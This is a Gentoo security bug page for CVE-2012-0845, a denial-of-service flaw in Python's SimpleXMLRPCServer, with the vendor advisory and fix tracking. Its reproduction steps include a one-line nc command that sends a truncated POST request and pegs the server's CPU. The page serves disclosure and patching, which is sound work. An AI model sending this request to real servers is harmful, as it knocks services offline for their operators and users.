Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 403437 (CVE-2012-0845) - <dev-lang/python-{2.6.8,2.7.3-r1,3.1.5,3.2.3}: DoS by processing malformed XMLRPC / HTTP POST request (CVE-2012-0845)
Summary: <dev-lang/python-{2.6.8,2.7.3-r1,3.1.5,3.2.3}: DoS by processing malformed XM...
Alias: CVE-2012-0845
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal normal (vote)
Assignee: Gentoo Security
Whiteboard: A3 [glsa]
Depends on:
Reported: 2012-02-13 17:26 UTC by Agostino Sarubbo
Modified: 2014-01-06 21:28 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Note You need to log in before you can comment on or make changes to this bug.
Description Agostino Sarubbo gentoo-dev 2012-02-13 17:26:41 UTC
A denial of service flaw was found in the way Simple XML-RPC Server module of Python processed client connections, that were closed prior the complete request body has been received. A remote attacker could use this flaw to cause Python Simple XML-RPC based server process to consume excessive amount of CPU.

Issue reported by Daniel Callaghan


Steps to reproduce:
A) for v3.2.2 version:

1) start server:

from xmlrpc.server import SimpleXMLRPCServer
server = SimpleXMLRPCServer(('', 12345))

2) # top

3) issue request from client:
echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' | nc localhost 12345

Return to 'top' screen and see, how CPU consumption on particular host quickly moves to 100%.

B) for v2.7.2 version:

1) start server:


from SimpleXMLRPCServer import SimpleXMLRPCServer

server = SimpleXMLRPCServer(('', 12345))

Steps 2) and 3) for v2.7.2 version are identical to
those for v3.2.2 version.
Comment 2 GLSAMaker/CVETool Bot gentoo-dev 2012-10-07 23:16:17 UTC
CVE-2012-0845 ( in SimpleXMLRPCServer in Python before 2.6.8, 2.7.x
  before 2.7.3, 3.x before 3.1.5, and 3.2.x before 3.2.3 allows remote
  attackers to cause a denial of service (infinite loop and CPU consumption)
  via an XML-RPC POST request that contains a smaller amount of data than
  specified by the Content-Length header.
Comment 3 GLSAMaker/CVETool Bot gentoo-dev 2014-01-06 21:28:13 UTC
This issue was resolved and addressed in
 GLSA 201401-04 at
by GLSA coordinator Sergey Popov (pinkbyte).